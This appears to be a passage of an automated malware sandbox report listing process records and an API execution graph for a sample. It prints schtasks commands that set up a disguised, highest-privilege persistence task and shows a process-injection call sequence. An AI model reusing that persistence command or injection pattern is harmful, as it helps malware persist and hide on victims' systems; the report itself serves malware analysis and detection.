                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:55
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:56
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:58
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:59
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:60
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:61
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:62
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:63
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:64
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:65
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:66
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:67
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:68
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:69
                Start time:11:37:08
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                  Execution Graph

                  Execution Coverage:17.1%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:75.8%
                  Total number of Nodes:33
                  Total number of Limit Nodes:0
                  execution_graph 5953 2795c38 5954 2795c52 5953->5954 5957 2795cb8 5954->5957 5958 2795cfb 5957->5958 5984 2796e00 5958->5984 5988 2796df7 5958->5988 5959 27963d4 5960 27964ea 5959->5960 5967 27971db Wow64SetThreadContext 5959->5967 5968 27971e0 Wow64SetThreadContext 5959->5968 5975 2797539 VirtualAllocEx 5960->5975 5976 27975ec VirtualAllocEx ResumeThread 5960->5976 5977 2797540 VirtualAllocEx 5960->5977 5961 2796743 5969 2797398 WriteProcessMemory 5961->5969 5970 2797390 WriteProcessMemory 5961->5970 5962 2796ad8 5980 2797398 WriteProcessMemory 5962->5980 5981 2797390 WriteProcessMemory 5962->5981 5963 2796845 5963->5962 5978 2797398 WriteProcessMemory 5963->5978 5979 2797390 WriteProcessMemory 5963->5979 5964 2796b2a 5965 2796c3e 5964->5965 5982 27971db Wow64SetThreadContext 5964->5982 5983 27971e0 Wow64SetThreadContext 5964->5983 5971 27975ec VirtualAllocEx ResumeThread 5965->5971 5972 2797a00 ResumeThread 5965->5972 5966 2795c86 5967->5960 5968->5960 5969->5963 5970->5963 5971->5966 5972->5966 5975->5961 5976->5961 5977->5961 5978->5963 5979->5963 5980->5964 5981->5964 5982->5965 5983->5965 5985 2796e86 CreateProcessA 5984->5985 5987 279709f 5985->5987 5989 2796e86 CreateProcessA 5988->5989 5991 279709f 5989->5991
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 02760e43a74798f8937b76e1e2d25ba2e1e8444155bfae6c9b122f921260a624
                  • Instruction ID: df70ef09d953d49ae3f985e8f5d28b44c4bae44bfdf30ad5a3a9c1a1b838898f
                  • Opcode Fuzzy Hash: 02760e43a74798f8937b76e1e2d25ba2e1e8444155bfae6c9b122f921260a624
                  • Instruction Fuzzy Hash: 0DA2E274E012289FDB64DF68D894BEDBBB6BF89300F1481EAD409A7290DB355E85CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18443ced7ec41f7d2797c5dea5bfb033ee076e26604d516eb243eed5beaef60e
                  • Instruction ID: d560944e7656970fdf863cc6685995f8fe5775bca3faff5793ba84feb8c2794c
                  • Opcode Fuzzy Hash: 18443ced7ec41f7d2797c5dea5bfb033ee076e26604d516eb243eed5beaef60e
                  • Instruction Fuzzy Hash: C4F11A74E003198FDF58DFA8D890BADBBF6AF88310F1481A9D909A7395DA349E41CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 027975AE
                  • ResumeThread.KERNEL32(?), ref: 02797A62
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: AllocResumeThreadVirtual
                  • String ID:
                  • API String ID: 234695336-0
                  • Opcode ID: 2f3dfed73d7c0a5fce185151440a03b5f03f8e8d9905e40807fc40fadfbcf2b9
                  • Instruction ID: 3ca258c92d8f0c9a8b24aa0107ddcabaa7d7a63f39aa87ee84a269befb048a49
                  • Opcode Fuzzy Hash: 2f3dfed73d7c0a5fce185151440a03b5f03f8e8d9905e40807fc40fadfbcf2b9
                  • Instruction Fuzzy Hash: 3331EBB2C043888FDB21DFA9D8443DEFFF0EF45324F15849AC098AB291DA345949CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 93 2796df7-2796e92 95 2796e94-2796eb9 93->95 96 2796ee6-2796f06 93->96 95->96 99 2796ebb-2796ebd 95->99 100 2796f08-2796f2d 96->100 101 2796f5a-2796f8b 96->101 102 2796ebf-2796ec9 99->102 103 2796ee0-2796ee3 99->103 100->101 111 2796f2f-2796f31 100->111 109 2796f8d-2796fb5 101->109 110 2796fe2-279709d CreateProcessA 101->110 104 2796ecb 102->104 105 2796ecd-2796edc 102->105 103->96 104->105 105->105 108 2796ede 105->108 108->103 109->110 119 2796fb7-2796fb9 109->119 127 279709f-27970a5 110->127 128 27970a6-279712c 110->128 112 2796f33-2796f3d 111->112 113 2796f54-2796f57 111->113 116 2796f3f 112->116 117 2796f41-2796f50 112->117 113->101 116->117 117->117 118 2796f52 117->118 118->113 121 2796fbb-2796fc5 119->121 122 2796fdc-2796fdf 119->122 123 2796fc9-2796fd8 121->123 124 2796fc7 121->124 122->110 123->123 126 2796fda 123->126 124->123 126->122 127->128 138 279713c-2797140 128->138 139 279712e-2797132 128->139 141 2797150-2797154 138->141 142 2797142-2797146 138->142 139->138 140 2797134-2797137 call 2790394 139->140 140->138 145 2797164-2797168 141->145 146 2797156-279715a 141->146 142->141 144 2797148-279714b call 2790394 142->144 144->141 149 279717a-2797181 145->149 150 279716a-2797170 145->150 146->145 148 279715c-279715f call 2790394 146->148 148->145 151 2797198 149->151 152 2797183-2797192 149->152 150->149 155 2797199 151->155 152->151 155->155
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0279708A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 994bb2d4441b283e3775e74e7e4924cac467dc43c511a47568f8e971fd834823
                  • Instruction ID: f1c9d5b414fea34bf2255cc96c98523cf06bb17bfd1450d570623159cab55ca4
                  • Opcode Fuzzy Hash: 994bb2d4441b283e3775e74e7e4924cac467dc43c511a47568f8e971fd834823
                  • Instruction Fuzzy Hash: 31A15A71E00319CFEF24CFA8D841BEDBBB6BB48314F108569E808A7294DB759985CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 156 2796e00-2796e92 158 2796e94-2796eb9 156->158 159 2796ee6-2796f06 156->159 158->159 162 2796ebb-2796ebd 158->162 163 2796f08-2796f2d 159->163 164 2796f5a-2796f8b 159->164 165 2796ebf-2796ec9 162->165 166 2796ee0-2796ee3 162->166 163->164 174 2796f2f-2796f31 163->174 172 2796f8d-2796fb5 164->172 173 2796fe2-279709d CreateProcessA 164->173 167 2796ecb 165->167 168 2796ecd-2796edc 165->168 166->159 167->168 168->168 171 2796ede 168->171 171->166 172->173 182 2796fb7-2796fb9 172->182 190 279709f-27970a5 173->190 191 27970a6-279712c 173->191 175 2796f33-2796f3d 174->175 176 2796f54-2796f57 174->176 179 2796f3f 175->179 180 2796f41-2796f50 175->180 176->164 179->180 180->180 181 2796f52 180->181 181->176 184 2796fbb-2796fc5 182->184 185 2796fdc-2796fdf 182->185 186 2796fc9-2796fd8 184->186 187 2796fc7 184->187 185->173 186->186 189 2796fda 186->189 187->186 189->185 190->191 201 279713c-2797140 191->201 202 279712e-2797132 191->202 204 2797150-2797154 201->204 205 2797142-2797146 201->205 202->201 203 2797134-2797137 call 2790394 202->203 203->201 208 2797164-2797168 204->208 209 2797156-279715a 204->209 205->204 207 2797148-279714b call 2790394 205->207 207->204 212 279717a-2797181 208->212 213 279716a-2797170 208->213 209->208 211 279715c-279715f call 2790394 209->211 211->208 214 2797198 212->214 215 2797183-2797192 212->215 213->212 218 2797199 214->218 215->214 218->218
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0279708A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 7166469966c692bf0e053d96435d00e92c1876ad42d7a2570765b61983c3857a
                  • Instruction ID: fb1766c0dbca5cfb2783c14abf5e56a433575f91fd1db8a179f60c47bfedef5f
                  • Opcode Fuzzy Hash: 7166469966c692bf0e053d96435d00e92c1876ad42d7a2570765b61983c3857a
                  • Instruction Fuzzy Hash: B4A15A71E00319CFEF24CFA8D841BEDBBB6BB48314F108569E808A7294DB759985CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 2797539-279753c 315 279753f-27975bb VirtualAllocEx 314->315 316 27974c0-27974fa 314->316 321 27975bd-27975c3 315->321 322 27975c4-27975e9 315->322 325 27974fc-2797502 316->325 326 2797503-2797528 316->326 321->322 325->326
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 027975AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 21721aea9458eea926d6066b1892ec47ac3278c64e25be320860197884d461b0
                  • Instruction ID: d21126072d4ee02f8a5451cfeb8e1f30d1ba1aae4f820b3156a21387bd971b7e
                  • Opcode Fuzzy Hash: 21721aea9458eea926d6066b1892ec47ac3278c64e25be320860197884d461b0
                  • Instruction Fuzzy Hash: 3C315771D003098FDF24DFA9D845BEEFBF1AF88314F248419E559A7250CB399945CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 332 2797390-27973e6 334 27973e8-27973f4 332->334 335 27973f6-2797435 WriteProcessMemory 332->335 334->335 337 279743e-279746e 335->337 338 2797437-279743d 335->338 338->337
                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02797428
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 7ce224a18d6ec8859ad26c5ff7b89761406678917bfe7fd46ea1917766a55f42
                  • Instruction ID: 836106676c93c83c84795b41733e24feef1c89b73ee8e40e1d5fde6be180e30c
                  • Opcode Fuzzy Hash: 7ce224a18d6ec8859ad26c5ff7b89761406678917bfe7fd46ea1917766a55f42
                  • Instruction Fuzzy Hash: B22120B5D003499FDF10CFA9C981BEEBBB1BF48310F50842AE968A7240D7789941CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 342 2797398-27973e6 344 27973e8-27973f4 342->344 345 27973f6-2797435 WriteProcessMemory 342->345 344->345 347 279743e-279746e 345->347 348 2797437-279743d 345->348 348->347
                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02797428
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: f9006412c147afac0749253ed3998cb8b839f9b9d2f934447d5992188c8271ad
                  • Instruction ID: be44be3e5ad3a1988014ed333d9e0b1aa30917bdb19e1fa3c796aeb65f67f74b
                  • Opcode Fuzzy Hash: f9006412c147afac0749253ed3998cb8b839f9b9d2f934447d5992188c8271ad
                  • Instruction Fuzzy Hash: EB2130B1D003499FDF10CFAAC881BEEBBF5FB48310F50842AE918A7240D7789941CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 362 27971e0-279722b 364 279723b-279726b Wow64SetThreadContext 362->364 365 279722d-2797239 362->365 367 279726d-2797273 364->367 368 2797274-27972a4 364->368 365->364 367->368
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0279725E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 592325227b95123fd78dfa5ce30ac2e5319a38b30da4d5c96b32cf6f88c5b5ad
                  • Instruction ID: af060e7e5c53ee5ff2b3b82815650d3d9e46c98ee788b9ceeb4d20d0c5fb0621
                  • Opcode Fuzzy Hash: 592325227b95123fd78dfa5ce30ac2e5319a38b30da4d5c96b32cf6f88c5b5ad
                  • Instruction Fuzzy Hash: 4A2137B1D103098FDB14DFAAC485BAEBBF4EB48314F54842AE519A7240DB789945CFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 352 27971db-279722b 354 279723b-279726b Wow64SetThreadContext 352->354 355 279722d-2797239 352->355 357 279726d-2797273 354->357 358 2797274-27972a4 354->358 355->354 357->358
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0279725E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 6e2d919a83df662467f5c72c9f1e19347287bf371be605080f0451d4ca45c369
                  • Instruction ID: 253475f5beba6a497abcc3025692494a06e75a6d526d9f6c22e177807ab9f423
                  • Opcode Fuzzy Hash: 6e2d919a83df662467f5c72c9f1e19347287bf371be605080f0451d4ca45c369
                  • Instruction Fuzzy Hash: 132157B1D103098FDB14CFA9C5817EEBBF4AF48314F50842AE419A7240CB389945CFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 372 2797540-27975bb VirtualAllocEx 375 27975bd-27975c3 372->375 376 27975c4-27975e9 372->376 375->376
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 027975AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 723534d4020428297beed3bcfbd258cd443a126b52e16131f4be8d6ac61efc7f
                  • Instruction ID: 6da68d8c54f9e25f868652fe51b3213bfc3cdaca0841e91c81cccfacf5bcd5a2
                  • Opcode Fuzzy Hash: 723534d4020428297beed3bcfbd258cd443a126b52e16131f4be8d6ac61efc7f
                  • Instruction Fuzzy Hash: 17115371C003499FDB20DFAAC845BEEBBF5EB48320F148419E919A7250CB35A901CFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 380 2797a00-2797a6f ResumeThread 383 2797a78-2797a9d 380->383 384 2797a71-2797a77 380->384 384->383
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: c7f73235ca4949367e62d76ccad1b066b552b31e57a983bffff805e7fae826f0
                  • Instruction ID: 012ef6bd26a571b03a32870345222258d10a519d24575d788c6b90add26bb7f2
                  • Opcode Fuzzy Hash: c7f73235ca4949367e62d76ccad1b066b552b31e57a983bffff805e7fae826f0
                  • Instruction Fuzzy Hash: 401128B1D003498FDB24DFAAD8457AEFBF5EB48224F148419D519A7240CB75A941CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee90df06094ab18ce4afafcf326496f3464791b471b8595804b9cd6b50ec099b
                  • Instruction ID: 5aadfb329c110ce318ab0a6351013a8d866ec3294aecfffaa9fc18fcd0a25208
                  • Opcode Fuzzy Hash: ee90df06094ab18ce4afafcf326496f3464791b471b8595804b9cd6b50ec099b
                  • Instruction Fuzzy Hash: C121007A604240EFDB15DF10D9C0B26BB65FBD8324F20C5A9E9090A256C336E856CAA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ad84a76fe9696ef9e6f5c5c62cfe923debe4d7fc433aab856f8c9f11dd80b8e
                  • Instruction ID: 0fb0f25015b989749baa093a92c98784d2fe4bc38b43516a5d23b09ed9330e86
                  • Opcode Fuzzy Hash: 7ad84a76fe9696ef9e6f5c5c62cfe923debe4d7fc433aab856f8c9f11dd80b8e
                  • Instruction Fuzzy Hash: 712103B9604240DFDB14DF14D9C0B26BF75FBD8328F24C569E8094F256C736D856CAA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction ID: fedf922baabcb1a71e8de1bb661955bb00d996a0a37ea94401966fa0337ceacd
                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction Fuzzy Hash: 5211D376504280DFCB16CF14D5C4B16BF72FB94324F24C5A9D8490B656C336D856CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction ID: ae7bb8c51d4f572fabc6481d265af3a3ed64159dd70bbe9e89af0de245c0e7e9
                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction Fuzzy Hash: 4811E676504280CFCB15CF14D5C4B16BF72FB94328F24C5ADD8494B656C336D856CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 36017136dd3f44b245acdcc08d805c8a3108f7bc5ee388d59be4ad69836feaef
                  • Instruction ID: 6ddba5881f0cf5f77147a112f170560df764297de6838c8db6ea353ffed895ed
                  • Opcode Fuzzy Hash: 36017136dd3f44b245acdcc08d805c8a3108f7bc5ee388d59be4ad69836feaef
                  • Instruction Fuzzy Hash: 8001A2755083449AE7208B25DC84B66BBA8DF91725F18C45AED190B282C6799845CAB2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e9d8dd20eea56b7402eecc2cb3398b1148cdbfd91705d073a3a07493b5f642b9
                  • Instruction ID: 1df031fa5a71c84c923e92913f82efde0ce6b4d53c403d4a3de1fbb1183b0be6
                  • Opcode Fuzzy Hash: e9d8dd20eea56b7402eecc2cb3398b1148cdbfd91705d073a3a07493b5f642b9
